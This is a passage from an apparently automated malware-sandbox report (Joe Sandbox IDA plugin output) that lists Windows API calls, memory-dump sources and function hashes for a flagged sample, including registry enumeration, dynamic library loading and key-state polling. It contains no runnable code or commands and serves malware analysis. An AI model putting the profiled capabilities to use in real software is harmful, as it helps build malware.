                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                              • String ID: %s%d
                              • API String ID: 1941087503-1110647743
                              • Opcode ID: a93f97d5d077b049614a73600b055f9c9b30f0ae4fc3fe18ac706a512aefe056
                              • Instruction ID: 1ee15f607347eed9e3b8dc29c71c75972f5708316398cabb5558fee169996f03
                              • Opcode Fuzzy Hash: a93f97d5d077b049614a73600b055f9c9b30f0ae4fc3fe18ac706a512aefe056
                              • Instruction Fuzzy Hash: 5A11B471204208BBDF247F68EC85FEA377DFF48704F144176B908EA252CA749A459B76
                              APIs
                              • CharUpperBuffW.USER32(?,?), ref: 008E2048
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: BuffCharUpper
                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                              • API String ID: 3964851224-769500911
                              • Opcode ID: dead8f1065921ffb5f02af03c7195c286e798943ecb9764f40d0e848955eb8ab
                              • Instruction ID: 80bc65c9564fda9704923516c55a6e15b72709917726d4a47495b65a72ddaad9
                              • Opcode Fuzzy Hash: dead8f1065921ffb5f02af03c7195c286e798943ecb9764f40d0e848955eb8ab
                              • Instruction Fuzzy Hash: F1115B759142098FCF10EFA8D9914EEB7F4FF5A304F108568D855E7292EB32A906CF51
                              APIs
                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008FEF1B
                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 008FEF4B
                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 008FF07E
                              • CloseHandle.KERNEL32(?), ref: 008FF0FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                              • String ID:
                              • API String ID: 2364364464-0
                              • Opcode ID: ef1c39fd3af289943a41595cb8d8a452a3625d7a8da1351632afe3669598ee76
                              • Instruction ID: 07ece44c84d1334fef289d17691e7bf6ff135245755e912084accfa81fac9db2
                              • Opcode Fuzzy Hash: ef1c39fd3af289943a41595cb8d8a452a3625d7a8da1351632afe3669598ee76
                              • Instruction Fuzzy Hash: DD8152716047119FD724EF28C886F2AB7E5FF88720F14881DF696DB292DB70AD418B52
                              APIs
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                • Part of subcall function 009010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00900038,?,?), ref: 009010BC
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00900388
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009003C7
                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0090040E
                              • RegCloseKey.ADVAPI32(?,?), ref: 0090043A
                              • RegCloseKey.ADVAPI32(00000000), ref: 00900447
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                              • String ID:
                              • API String ID: 3440857362-0
                              • Opcode ID: 04da734c09e6549798b13a1ead48150869a7edd963aadb464899f7cb7f1016c7
                              • Instruction ID: 6685edd824a130673ab16c5db8da7bf47b45fd988f3a9baa6f94fc16c2fce2e2
                              • Opcode Fuzzy Hash: 04da734c09e6549798b13a1ead48150869a7edd963aadb464899f7cb7f1016c7
                              • Instruction Fuzzy Hash: 92513831208204AFD714EF68C891F6EB7E8FF88714F44892EF595972A1EB31E905DB52
                              APIs
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 008FDC3B
                              • GetProcAddress.KERNEL32(00000000,?), ref: 008FDCBE
                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 008FDCDA
                              • GetProcAddress.KERNEL32(00000000,?), ref: 008FDD1B
                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 008FDD35
                                • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008E7B20,?,?,00000000), ref: 00885B8C
                                • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008E7B20,?,?,00000000,?,?), ref: 00885BB0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                              • String ID:
                              • API String ID: 327935632-0
                              • Opcode ID: 471be3dd1ce2bae88ed03005816db53c76b9b4f122064db094944f1d4ef9443d
                              • Instruction ID: dec0f9dce08120233bceede0f0592ff20cb4f3052bdca275d0fba08748ca7ff6
                              • Opcode Fuzzy Hash: 471be3dd1ce2bae88ed03005816db53c76b9b4f122064db094944f1d4ef9443d
                              • Instruction Fuzzy Hash: D0510735A04209DFCB10EF68C8949ADB7F5FF59310B188069EA55EB312DB31ED45CB91
                              APIs
                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008EE88A
                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 008EE8B3
                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 008EE8F2
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 008EE917
                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 008EE91F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                              • String ID:
                              • API String ID: 1389676194-0
                              • Opcode ID: 479bde119cf5a07c938ce6948c44e1efb11167ab4ad085934642d72fbae74ace
                              • Instruction ID: a98398eb4513fb86ac8511e43c6a1d0e99dea6e49bb561991cb2e44be22aea8b
                              • Opcode Fuzzy Hash: 479bde119cf5a07c938ce6948c44e1efb11167ab4ad085934642d72fbae74ace
                              • Instruction Fuzzy Hash: 86510935A00215DFCB15EF69C9819AEBBF5FF09310B1880A9E849EB362CB31ED11DB51
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3da126257d906fdb26cd56461837ddaddbe1a45b4a9f716d36b41c8f7ffefb65
                              • Instruction ID: f60d54fefe89b32cf8997d636cb0aaf950443a75c21007c7e75cbb5c94d0893f
                              • Opcode Fuzzy Hash: 3da126257d906fdb26cd56461837ddaddbe1a45b4a9f716d36b41c8f7ffefb65
                              • Instruction Fuzzy Hash: 2441D139904304AFD720DF28CC58FA9BBACFB09320F154265F855A72E1D770AE81DAD2
                              APIs
                              • GetCursorPos.USER32(?), ref: 00882357
                              • ScreenToClient.USER32(009467B0,?), ref: 00882374
                              • GetAsyncKeyState.USER32(00000001), ref: 00882399
                              • GetAsyncKeyState.USER32(00000002), ref: 008823A7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AsyncState$ClientCursorScreen
                              • String ID:
                              • API String ID: 4210589936-0
                              • Opcode ID: 2483bb89c81b9ec439a122cae71d2935c84a7eec7af1e15af0c641481b4c3cdd
                              • Instruction ID: 87dcc7880c9624c1cd4d7aae12439e96ec8ddfd174547df84e128421f564d77d
                              • Opcode Fuzzy Hash: 2483bb89c81b9ec439a122cae71d2935c84a7eec7af1e15af0c641481b4c3cdd
                              • Instruction Fuzzy Hash: 1C417F75504119FFDF19AF68C854AEDBB74FB45324F20435AF828E23A0C7346A94DB91
                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008D695D
                              • TranslateAcceleratorW.USER32(?,?,?), ref: 008D69A9
                              • TranslateMessage.USER32(?), ref: 008D69D2
                              • DispatchMessageW.USER32(?), ref: 008D69DC
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008D69EB
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                              • String ID:
                              • API String ID: 2108273632-0
                              • Opcode ID: 98fcded3d896ec28aa4784381cc11e5c26c91fbde17f7de38bf0ad55428b7f76
                              • Instruction ID: 905f78107de634287fa5c5eae3bab8bba848eeb4814ea5d38e4d80d03268e2ff
                              • Opcode Fuzzy Hash: 98fcded3d896ec28aa4784381cc11e5c26c91fbde17f7de38bf0ad55428b7f76
                              • Instruction Fuzzy Hash: 4E31E4B191421EBEDB20CF748C94FB67BA8FB03304F144366E461D22A1F77598A5E791
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 008D8F12
                              • PostMessageW.USER32(?,00000201,00000001), ref: 008D8FBC
                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 008D8FC4
                              • PostMessageW.USER32(?,00000202,00000000), ref: 008D8FD2
                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 008D8FDA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessagePostSleep$RectWindow
                              • String ID:
                              • API String ID: 3382505437-0
                              • Opcode ID: 5c38bdacc0e1e9082b7e952baa8a7b9966000972e2406617a3a0f7594defd8a3
                              • Instruction ID: ecb873577da332d9bff5531a0b677e8e231a84c64801938d2bd23431b7610f97
                              • Opcode Fuzzy Hash: 5c38bdacc0e1e9082b7e952baa8a7b9966000972e2406617a3a0f7594defd8a3
                              • Instruction Fuzzy Hash: A431CE71504219EFDB14CF68DD4CAAE7BB6FB04315F10422AF925EA2D0CBB09A54DB91
                              APIs
                              • IsWindowVisible.USER32(?), ref: 008DB6C7
                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 008DB6E4
                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 008DB71C
                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 008DB742
                              • _wcsstr.LIBCMT ref: 008DB74C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                              • String ID:
                              • API String ID: 3902887630-0
                              • Opcode ID: c0e85ebfe12c70219afc26efc82ec193e06ca8b3587dddb88984c7d5565e03b0
                              • Instruction ID: 9fe8474bc5a5f9912149489fafd98e8042c9d8703ee286a5da8833311dae1795
                              • Opcode Fuzzy Hash: c0e85ebfe12c70219afc26efc82ec193e06ca8b3587dddb88984c7d5565e03b0
                              • Instruction Fuzzy Hash: 5B21F932204248FFEB255B799C49E7B7B98FF4A760F01413AFC05CA2A1EF61DC419661
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                              • GetWindowLongW.USER32(?,000000F0), ref: 0090B44C
                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0090B471
                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0090B489
                              • GetSystemMetrics.USER32(00000004), ref: 0090B4B2
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,008F1184,00000000), ref: 0090B4D0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$Long$MetricsSystem
                              • String ID:
                              • API String ID: 2294984445-0
                              • Opcode ID: e380e0a0e30142ae0910ff88d4903e492dbb8855c84725db0f99672912e55c29
                              • Instruction ID: 2b16aaceec89b4fe5c4efa86ac1a205168fadc5d243e94c7569bd85d7358c61c
                              • Opcode Fuzzy Hash: e380e0a0e30142ae0910ff88d4903e492dbb8855c84725db0f99672912e55c29
                              • Instruction Fuzzy Hash: 98219571524255AFCB209F39CC54A6A37A8FB05720F154B38FD26D76F1E7309A50EB90
                              APIs
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008D9802
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008D9834
                              • __itow.LIBCMT ref: 008D984C
                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008D9874
                              • __itow.LIBCMT ref: 008D9885
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$__itow$_memmove
                              • String ID:
                              • API String ID: 2983881199-0
                              • Opcode ID: b07df7a429ad997a44794a6029c0fc6f6c3677c95acd308135993ce618eb69d0
                              • Instruction ID: bc12aada8573d5c72aacd67df957bd366627da1998eb1c4fbef0cfba1c10dfa7
                              • Opcode Fuzzy Hash: b07df7a429ad997a44794a6029c0fc6f6c3677c95acd308135993ce618eb69d0
                              • Instruction Fuzzy Hash: B221DA31B00208AFDB20AA658C86EEE7BB9FF4AB14F140136FD45DB351D671DD41A792
                              APIs
                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0088134D
                              • SelectObject.GDI32(?,00000000), ref: 0088135C
                              • BeginPath.GDI32(?), ref: 00881373
                              • SelectObject.GDI32(?,00000000), ref: 0088139C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ObjectSelect$BeginCreatePath
                              • String ID:
                              • API String ID: 3225163088-0
                              • Opcode ID: 001dea02a9c2f69524c335183420bc29f97d415aa59227d15b57c28e560e589b
                              • Instruction ID: 61d21b3c8534c431f812fe0fc12d50a92f657f2833ef26fe49b945afe10f5b68
                              • Opcode Fuzzy Hash: 001dea02a9c2f69524c335183420bc29f97d415aa59227d15b57c28e560e589b
                              • Instruction Fuzzy Hash: 3C2162B4828308DFDF219F25DC08B697BB8FB12322F144225F414D67A0DB759992EB91
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memcmp
                              • String ID:
                              • API String ID: 2931989736-0
                              • Opcode ID: 4905800d39e264a15e7e56b886ca92b530dc8e1535d2d9f0581b5e8126e340fc
                              • Instruction ID: fdd9ef3d68a64f66f80602a58f45960c5b2348a7c1937313c7eb8d534cce9ab4
                              • Opcode Fuzzy Hash: 4905800d39e264a15e7e56b886ca92b530dc8e1535d2d9f0581b5e8126e340fc
                              • Instruction Fuzzy Hash: 6001967170422B7BEA04B6255C46EAB775CFF623A8F044212FE04D6383E6609E11C2E1
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 008E4D5C
                              • __beginthreadex.LIBCMT ref: 008E4D7A
                              • MessageBoxW.USER32(?,?,?,?), ref: 008E4D8F
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 008E4DA5
                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008E4DAC
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                              • String ID:
                              • API String ID: 3824534824-0
                              • Opcode ID: 1b6a01aa170c3661893078f4415c417e33cf28a212a945cc275f4df61a4b54ea
                              • Instruction ID: c288b7a8e06307dccab53b3bb471b80204bc55dd3208929d216f60be6f2eef89
                              • Opcode Fuzzy Hash: 1b6a01aa170c3661893078f4415c417e33cf28a212a945cc275f4df61a4b54ea
                              • Instruction Fuzzy Hash: 731148B6A18248BFC7108FA89C04E9A7FACFB87320F144265F928D3250C6B18D0497A1
                              APIs
                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008D8766
                              • GetLastError.KERNEL32(?,008D822A,?,?,?), ref: 008D8770
                              • GetProcessHeap.KERNEL32(00000008,?,?,008D822A,?,?,?), ref: 008D877F
                              • HeapAlloc.KERNEL32(00000000,?,008D822A,?,?,?), ref: 008D8786
                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008D879D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                              • String ID:
                              • API String ID: 842720411-0
                              • Opcode ID: fb8e16d4c09777ff33cf5f9312ee9cc6f948f4c3f258567e10895834fe1cc98b
                              • Instruction ID: a029189f417080a2837b696860bc1cc72694e68deaf9d9116cde0a329747dc0b
                              • Opcode Fuzzy Hash: fb8e16d4c09777ff33cf5f9312ee9cc6f948f4c3f258567e10895834fe1cc98b
                              • Instruction Fuzzy Hash: D4016D71614208FFDB204FA6DC98D6B7BADFF89355720053AF849C2260DA329D40DA60
                              APIs
                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E5502
                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 008E5510
                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E5518
                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 008E5522
                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008E555E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: PerformanceQuery$CounterSleep$Frequency
                              • String ID:
                              • API String ID: 2833360925-0
                              • Opcode ID: f15bacb959cd06df61691586fb3df340f804806378888bcfa3e49be9539c84bf
